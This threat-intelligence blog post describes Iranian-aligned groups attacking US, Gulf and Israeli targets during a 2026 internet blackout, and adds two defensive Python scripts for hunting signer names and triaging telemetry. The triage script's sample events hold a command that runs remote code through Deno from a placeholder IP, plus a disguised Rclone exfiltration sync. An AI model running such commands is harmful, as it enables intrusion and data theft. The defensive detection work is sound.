
How Iranian threat actors are operating without connectivity


Prayukth K V

On the morning of 28 February 2026, US and Israeli aircraft launched the strikes that opened the conflict now gripping the Middle East. By nightfall, NetBlocks was reporting Iranian internet connectivity at four percent of baseline. By 7 March, after more than a week of near-blackout, the figure stood at one percent: "one hundred and twenty hours of flatlining", as one well-known publication put it, measured in fractions of a country.

And yet, in the seven days that followed, Iranian-aligned threat actors were revealed to have compromised a US bank, a defence-sector software company with Israeli operations, an American airport and two Gulf energy corporations, and to have left backdoors on several networks in Canada. They also claimed to have exfiltrated 1.3 terabytes of data from an oil company. In the same period APT34 was observed attacking networks in India, Brazil, Bahrain and Canada.

So the question arises: how does a nation with one percent internet connectivity mount that kind of offensive? Is this some form of deception? The answer, assembled this week from national cyber agency advisories, government threat intelligence teams, Shieldworkz researchers and open-source forensic observation, points to a constellation of satellites orbiting roughly 550 kilometres above the Earth that Iran has simultaneously banned, criminalised, jammed and, through its intelligence operatives, quietly exploited.

Before we move forward, see our previous post, "As global conflicts escalate, APT playbooks are quietly changing".

So, here is what happened.

One percent connectivity and still online

Iran's current internet blackout is the second near-total shutdown in less than 60 days. The first began on 8 January 2026, triggered by mass protests, and cut connectivity to roughly three percent. Partial restoration followed in February, with traffic recovering to about fifty percent of normal by mid-month before collapsing again on 28 February with Operation Epic Fury, the joint US-Israeli strike campaign. Since then NetBlocks has reported connectivity consistently at or below four percent; the most recent published measurement, on 7 March, put it at one percent.

The National Information Network, Iran's domestic intranet, remains partially functional, but only for whitelisted institutions. State media, government ministries and IRGC-aligned communications channels were among the first services restored under the whitelist system, in a set order of priority. That means the regime's loyal operators, including intelligence contractors and sanctioned cyber units, retain controlled domestic connectivity even while civilian internet access is severed. Reaching the global internet, however, requires something else, and that something came from the sky.

According to a Wall Street Journal report confirmed by multiple downstream outlets this week, some 7,000 Starlink terminals were brought into Iran during the January blackout. Together with an estimated 50,000 smuggled terminals already in the country, they created the physical substrate for a parallel communications layer used by segments of the population protesting against the Iranian government.

Iran's jamming response has been persistent and documented. GPS interference data from gpsjam.org analysed by Shieldworkz shows persistent contamination of the 1575.42 MHz GPS L1 band across the Tehran region since 28 February, consistent with the mobile jamming operations that began in January. Two caveats apply when reading that data. First, gpsjam.org derives its map from navigation-accuracy fields broadcast by aircraft, so it reflects interference seen at altitude rather than measured conditions on the ground. Second, L1 jamming does not touch the Ku-band user link itself; a Starlink terminal relies on GNSS for position and timing while acquiring and tracking satellites, so the effect is degradation of Starlink lock rather than total blackout. Users with clear sky access outside a mobile jammer's radius continue to achieve usable throughput. That residual window, narrow in the cities and wider in rural and peri-urban areas, is what threat actors have been using. Some terminals may also have been seized by Iranian intelligence agencies and used to support threat actor operations directly.

Iranian internet connectivity chronology: 28 February to 10 March 2026

Date     | NetBlocks connectivity | Key event                                                     | Starlink status
Feb 28   | ~4%                    | Operation Epic Fury strikes begin                             | GPS jamming restarts; elevated packet loss
Mar 1    | ~4%                    | Leadership changes in Iran; interim council formed            | Mobile jammers deployed; degraded connections in Tehran
Mar 3    | <4%                    | Handala posts unverified claim of breaching a UAE oil and gas entity | Operations via Starlink IP ranges confirmed
Mar 5    | ~1-4%                  | Seedworm/MuddyWater breaches of US networks published         | Dindoor backdoor disclosed; whether operated over Starlink or from out-of-country nodes unconfirmed
Mar 7    | ~1%                    | Blackout enters day 8; 120+ hours confirmed                   | Handala active via Starlink; UK NCSC issues alert
Mar 9-10 | <2%                    | Cyber Islamic Resistance forms joint operations room          | Ongoing; no restoration announced

Sources: NetBlocks via Mastodon; CNBC, 7 March 2026; gpsjam.org; The National

Satellite operations and escalation

Handala Hack's activities over the last seven days represent a qualitative shift from its prior operating pattern. The group, assessed with high confidence by multiple Western government agencies to be a persona operated by Iran's Ministry of Intelligence and Security (MOIS), has moved from hack-and-leak operations against Israel to multi-vector operations spanning the whole of the Gulf, the United States and even the Iranian diaspora in North America.

Starlink as a connectivity layer is the operational foundation that makes this possible. Handala campaigns were already being run from Starlink IP ranges before the blackout, with the group probing externally facing applications for misconfigurations and weak credentials, and that pattern has continued into March. Two points matter for defenders reading source addresses. Starlink's customer address space is announced under a single autonomous system, AS14593, so it is easy to tag in proxy, VPN and WAF logs. But Starlink places most users behind carrier-grade NAT and geolocates them to the ground-station point of presence they egress through, not to the terminal, so a Starlink address tells you the operator's uplink, not their country. Treat it as a signal to weight, not as geolocation, and do not expect to block the ASN outright without cutting off legitimate users.

The most significant Handala operation of the last seven days was the claimed breach of an oil company in the UAE. Handala posted the claim on 3 March, when connectivity was below four percent, asserting extraction of 1.3 terabytes of data including financial statements, oil contracts and internal documents. The group's post on its dark web leak site stated: 'We dismantled critical infrastructure [sic] and extracted 1.3TB of sensitive data.' The language is consistent with the group's established communication style, designed for maximum psychological impact on Gulf governments that it regards as US military enablers. The oil company has not publicly confirmed or denied the intrusion. Analysis of the leaked sample material, where researchers have been able to examine it, has not yet established whether the data is fresh or pre-existing. The volume claimed is substantially larger than that of another claim the group made during the same week, which researchers classified as likely fabricated or heavily padded with previously circulating files. Recycling old data under new claims is a clear sign of desperation.

Separately, Handala also listed an Israeli oil company as a ransomware victim, with the same claimed 1.3 terabyte exfiltration figure appearing across both listings. Identical figures for two separate organisations is a red flag for inflation, and the combined claim should be treated with appropriate scepticism. What is not in doubt is the targeting pattern: Gulf energy infrastructure and the Israeli energy sector, the two categories most likely to generate strategic panic and media amplification.

Seedworm in US networks

The most significant revelation of the past seven days came not from Handala but from Seedworm, the long-running Iranian APT group that US government agencies including CISA and the FBI, and the UK NCSC, have attributed to Iran's Ministry of Intelligence and Security. Seedworm is Symantec's name for the actor that the same agencies track as MuddyWater. Seedworm has been sitting inside the networks of multiple US organisations since at least early February, weeks before the first airstrike. It is possible that Seedworm has reached networks in other countries as well.

The confirmed victim list includes a US bank, a US airport, a US-based software company that supplies the defence and aerospace industries and has operations in Israel, and non-governmental organisations in both the United States and Canada. Researchers have not established how Seedworm gained initial access, and an insider path cannot be ruled out at this point. The group is known for phishing and for exploiting vulnerabilities in public-facing applications, but the specific entry vector for this campaign has not been determined.

The researchers also found a new set of tools in use by the threat actor. The primary backdoor, named Dindoor, uses Deno, the JavaScript and TypeScript runtime developed as a modern alternative to Node.js, to run commands on infected machines. The choice of Deno is noteworthy. It is a relatively new runtime with a smaller security research footprint than Node.js, and its network communications can blend into legitimate developer traffic in environments where Deno is in use. Its "secure runtime" reputation is irrelevant here: Deno's permission model denies file, network and process access unless the launcher grants it, which protects a developer running untrusted scripts, not a victim. A backdoor that starts its own Deno process with --allow-all, or ships as a deno compile binary with permissions baked in, gets everything. What defenders can use is that deno.exe spawning child processes or making outbound connections is unusual on most hosts and easy to baseline. Dindoor was digitally signed with a certificate issued to an individual named Amy Cherne. That name connects directly to earlier Seedworm activity, although the certificate itself was issued for this campaign and is distinct from legacy Seedworm signing infrastructure.

A second backdoor found on the US airport and Canadian NGO networks, named Fakeset, was written in Python and signed with both the Amy Cherne certificate and a certificate issued to Donald Gay, another name previously linked to the Seedworm malware families Stagecomp and Darkcomp. Reusing signing identities across campaigns is the operational security lapse that makes attribution possible. Whether it was carelessness or a deliberate choice to make attribution easy is an open question, and the latter cannot be dismissed. Either way, the signer names are a concrete hunting artefact: any binary whose Authenticode signature names one of these identities should be treated as suspect regardless of whether the chain validates, because these certificates were validly issued rather than forged.
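As an added example (not code from the post, nor from the researchers who analysed Dindoor and Fakeset), the following Python script hunts a directory tree for PE files whose Authenticode signature names either of the signer identities reported above. It parses the PE security directory with the standard library only and byte-searches the PKCS#7 blob, which is sufficient because X.509 subject names are stored as ASCII PrintableString or UTF8String; it does not validate the signature. The watch list holds the two names from the post; the fake PE builder, its sample payloads and every path are constructed for the demonstration.

```python
"""Hunt PE files for Authenticode signatures naming a watched signer.

Added example, not code from the original post. Reads the PE security directory
(IMAGE_DIRECTORY_ENTRY_SECURITY) with the standard library and byte-searches the
PKCS#7 blob for signer common names. The watch list is the two signer names the
post reports; build_fake_pe() and the sample payloads are constructed for the demo.
"""
import os
import struct
from typing import Iterator, List, Optional

WATCHED_SIGNERS = ["Amy Cherne", "Donald Gay"]  # signer names reported in the post
IMAGE_DIRECTORY_ENTRY_SECURITY = 4
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def security_directory(data: bytes) -> Optional[bytes]:
    """Return the raw certificate table of a PE file, or None if unsigned or not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    if len(data) < opt + 2:
        return None
    (magic,) = struct.unpack_from("<H", data, opt)
    # Data directories start at +96 (PE32) or +112 (PE32+) inside the optional header
    dir_base = opt + (112 if magic == PE32PLUS_MAGIC else 96)
    entry = dir_base + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    if entry + 8 > opt + size_of_optional or entry + 8 > len(data):
        return None
    offset, size = struct.unpack_from("<II", data, entry)
    # Unlike other directories, the security entry holds a file offset, not an RVA
    if offset == 0 or size == 0 or offset + size > len(data):
        return None
    return data[offset:offset + size]


def win_certificates(table: bytes) -> Iterator[bytes]:
    """Yield bCertificate payloads from the WIN_CERTIFICATE entries of a cert table."""
    pos = 0
    while pos + 8 <= len(table):
        length, _revision, cert_type = struct.unpack_from("<IHH", table, pos)
        if length < 8 or pos + length > len(table):
            break
        if cert_type == 0x0002:  # WIN_CERT_TYPE_PKCS_SIGNED_DATA
            yield table[pos + 8:pos + length]
        pos += (length + 7) & ~7  # entries are 8-byte aligned


def watched_signer_hits(data: bytes, watch: List[str] = WATCHED_SIGNERS) -> List[str]:
    """Return the watched signer names that appear in the file's Authenticode blob."""
    table = security_directory(data)
    if table is None:
        return []
    blob = b"".join(win_certificates(table))
    return [name for name in watch if name.encode("ascii") in blob]


def scan_tree(root: str) -> dict:
    """Walk a directory tree and map each hit file to the watched signers it carries."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    found = watched_signer_hits(fh.read())
            except OSError:
                continue
            if found:
                hits[path] = found
    return hits


def build_fake_pe(cert_payload: Optional[bytes]) -> bytes:
    """Constructed PE32+ skeleton: just enough header to carry a certificate table."""
    opt_size = 240
    cert_offset = 0x40 + 4 + 20 + opt_size
    cert_table = b""
    if cert_payload is not None:
        cert_table = struct.pack("<IHH", 8 + len(cert_payload), 0x0200, 0x0002) + cert_payload
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, PE32PLUS_MAGIC)
    struct.pack_into("<II", optional, 112 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8,
                     cert_offset if cert_table else 0, len(cert_table))
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, opt_size, 0x22)
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + cert_table


if __name__ == "__main__":
    # Constructed samples: a blob naming one watched signer, and an unsigned file
    signed = build_fake_pe(b"\x30\x82\x01\x00CN=Amy Cherne, O=Example" + b"\x00" * 16)
    print(watched_signer_hits(signed))               # ['Amy Cherne']
    print(watched_signer_hits(build_fake_pe(None)))  # []
```

On a Windows host, Get-AuthenticodeSignature with its SignerCertificate property yields the same subject names; the script is for sweeping file shares, backups and non-Windows collection points where that cmdlet is not available.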

In at least one incident, targeting the defence-aerospace software company, Seedworm attempted to exfiltrate data using Rclone, a widely available open-source tool for synchronising data to cloud storage services, directed at a Wasabi Technologies cloud storage bucket. Whether the transfer succeeded remains unconfirmed. The Fakeset malware was hosted on Backblaze, another commercial cloud storage provider, continuing the pattern of using legitimate infrastructure to evade detection. Rclone speaks the providers' standard S3 and B2 APIs over HTTPS, so the transfer looks like any other cloud sync; the useful signals are the process itself, which attackers often rename, and the provider domains (wasabisys.com, backblazeb2.com) appearing in proxy or DNS logs from hosts that have no business reason to use those services.
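The Deno and Rclone tradecraft described in the two passages above lends itself to a small set of endpoint and proxy rules. The following Python script is an added example, not code from the post or any vendor: it triages constructed process-creation and network events for Deno launched with unscoped permissions, rclone-style bulk copies to a cloud remote (including a renamed binary, caught by the verb plus remote:path shape), and connections to Wasabi or Backblaze API domains, then raises a high-severity finding where one host shows both a bulk-copy process and a cloud-storage destination. The event field names, host names and sample events are constructed; the domain suffixes are the providers' real API domains; the allowlist is a placeholder a team would replace.

```python
"""Triage constructed endpoint/proxy telemetry for the tradecraft described above.

Added example, not code from the post or any vendor. Event fields (type, host,
image, cmdline, dest), host names and SAMPLE_EVENTS are constructed; the domain
suffixes are the providers' real S3/B2 API domains; ALLOWLISTED_HOSTS is a placeholder.
"""
import json
import re
from collections import defaultdict
from typing import Dict, List, Set

CLOUD_STORAGE_SUFFIXES = ("wasabisys.com", "backblazeb2.com")
ALLOWLISTED_HOSTS = {"backup-srv01"}  # hypothetical hosts with a sanctioned backup job
# Unscoped grants only; a scoped flag such as --allow-net=localhost:8000 is not flagged
DENO_BROAD_PERMS = {"-A", "--allow-all", "--allow-net", "--allow-run", "--allow-read", "--allow-write"}
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# rclone remote:path syntax; two or more characters before the colon so that
# Windows drive letters (C:\...) do not match; URLs are excluded separately
REMOTE_ARG = re.compile(r"^[A-Za-z0-9_-]{2,}:[^:]*$")

# Constructed sample events, one JSON object per line
SAMPLE_EVENTS = r"""
{"type": "process", "host": "ws-eng-07", "image": "C:\\Users\\dev\\.deno\\bin\\deno.exe", "cmdline": "deno.exe run -A https://203.0.113.5/upd/agent.ts"}
{"type": "process", "host": "ws-eng-07", "image": "C:\\Users\\dev\\.deno\\bin\\deno.exe", "cmdline": "deno.exe run --allow-net=localhost:8000 dev.ts"}
{"type": "process", "host": "fs-01", "image": "C:\\ProgramData\\svc\\sync.exe", "cmdline": "sync.exe sync D:\\projects wasabi:eng-archive --transfers 16 --config C:\\ProgramData\\svc\\r.conf"}
{"type": "network", "host": "fs-01", "dest": "s3.eu-central-1.wasabisys.com", "port": 443}
{"type": "network", "host": "backup-srv01", "dest": "s3.us-west-002.backblazeb2.com", "port": 443}
{"type": "process", "host": "dc-01", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c copy C:\\a.txt D:\\b.txt"}
"""


def _finding(ev: dict, rule: str, severity: str, evidence: str) -> dict:
    return {"rule": rule, "severity": severity, "host": ev.get("host"), "evidence": evidence}


def check_process(ev: dict) -> List[dict]:
    """Process-creation rules: Deno with broad permissions, rclone-style bulk copy."""
    out = []
    image = ev.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    args = ev.get("cmdline", "").split()[1:]
    if image in ("deno", "deno.exe") and DENO_BROAD_PERMS & set(args):
        out.append(_finding(ev, "deno_broad_permissions", "medium", ev["cmdline"]))
    verb = next((a for a in args if a in RCLONE_VERBS), None)
    remote = next((a for a in args if REMOTE_ARG.match(a) and "://" not in a), None)
    # Match the real binary name or, for a renamed copy, the verb plus remote:path shape
    if image in ("rclone", "rclone.exe") or (verb and remote):
        out.append(_finding(ev, "rclone_bulk_copy", "medium", ev["cmdline"]))
    return out


def check_network(ev: dict) -> List[dict]:
    """Network rule: a connection to a Wasabi or Backblaze API domain from an unsanctioned host."""
    dest = ev.get("dest", "").lower()
    hit = any(dest == s or dest.endswith("." + s) for s in CLOUD_STORAGE_SUFFIXES)
    if hit and ev.get("host") not in ALLOWLISTED_HOSTS:
        return [_finding(ev, "cloud_storage_destination", "low", dest)]
    return []


def triage(jsonl: str) -> List[dict]:
    """Run the per-event rules, then correlate bulk copy + cloud destination per host."""
    findings: List[dict] = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if ev.get("type") == "process":
            findings += check_process(ev)
        elif ev.get("type") == "network":
            findings += check_network(ev)
    rules_by_host: Dict[str, Set[str]] = defaultdict(set)
    for f in findings:
        rules_by_host[f["host"]].add(f["rule"])
    for host, rules in rules_by_host.items():
        if {"rclone_bulk_copy", "cloud_storage_destination"} <= rules:
            findings.append({"rule": "rclone_to_cloud_storage", "severity": "high", "host": host,
                             "evidence": "bulk copy tool and cloud storage endpoint on the same host"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['host']:12} {f['rule']:26} {f['evidence']}")
```

The scoped Deno invocation and the cmd.exe copy with drive-letter paths are in the sample deliberately: both are the benign look-alikes that a naive string match on "allow" or "copy" would flag, and neither produces a finding. Tuning in practice means extending the allowlist from asset inventory, not loosening the regexes.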

The critical strategic question raised by this discovery is whether Seedworm was pre-positioning for intelligence collection, for disruption, or for both. Any persistent network foothold can be escalated, starting with data exfiltration and ending with a disruptive or even kinetic outcome.

This is made more unsettling by Iran's 2025 CCTV surveillance operation. In May 2025, MuddyWater compromised a server carrying live CCTV streams from Jerusalem. On 23 June 2025, Iran struck Jerusalem, and Israeli authorities reported the same day that Iranian forces had used compromised security cameras to collect real-time targeting intelligence. The path from passive access to active targeting took five weeks. The Seedworm foothold in US networks was planted in early February. It is now mid-March.

What lies ahead?

The past seven days have been characterised by a high ratio of claims to confirmed impacts. Most hacktivist assertions of successful ICS compromise, energy sector destruction and critical infrastructure disruption remain unverified. The Foundation for Defense of Democracies published analysis this week stating flatly that most of the claimed hacks are likely false or overblown. Jordan's National Cybersecurity Center confirmed that it thwarted, rather than succumbed to, an attack on a wheat silo management system.

But the quiet professional layer is a different story. Seedworm's confirmed presence inside a US bank, an airport, a defence supplier with Israeli operations and multiple NGOs is not a claim. It is documented network activity, forensically attributed through signing certificates and malware code, and the affected organisations have been notified. The foothold exists. The question for the next two to four weeks is whether it remains espionage infrastructure or becomes the basis for a disruptive or destructive operation.

For organisations in the sectors touched by this week's confirmed activity, the signal is clear: the door the Seedworm team walked through in February is still open in many organisations that do not yet know they were targeted. The Dindoor backdoor was built to blend in. Here is how things could unfold:

· Iranian threat actors activate more pre-compromised networks to target enterprises in the Gulf and beyond, and may route traffic through those networks to mask its origin

· As available bandwidth increases, so will these groups' reconnaissance capacity

· Iranian actors could also gain access to bot farms run by Russian and Chinese APT groups to target specific critical infrastructure entities

· In the meantime, Iranian groups will claim responsibility for many more breaches to stay in the news

· The peak of Iranian targeting efforts is yet to come

In addition, these patterns can be extrapolated to understand what the next set of targets could be:

Threat group    | Notable activity (March 2026)           | Potential targets                              | Primary technique
MuddyWater      | Infiltration of US banks and airports   | Data centres, seaports, defence vendors        | Abuse of RMM tools (AnyDesk, Syncro)
Handala Hack    | Targeting Israeli energy and healthcare | Expanded focus on Israeli and US entities      | High-volume data exfiltration (1.3 TB+ claimed)
APT34 (OilRig)  | Probing Gulf energy infrastructure      | Gulf energy infrastructure (expected to continue) | Exploitation of Fortinet VPNs
FAD Team        | Targeting regional security firms       | Regional security firms (expected to continue) | Custom wiper malware deployment
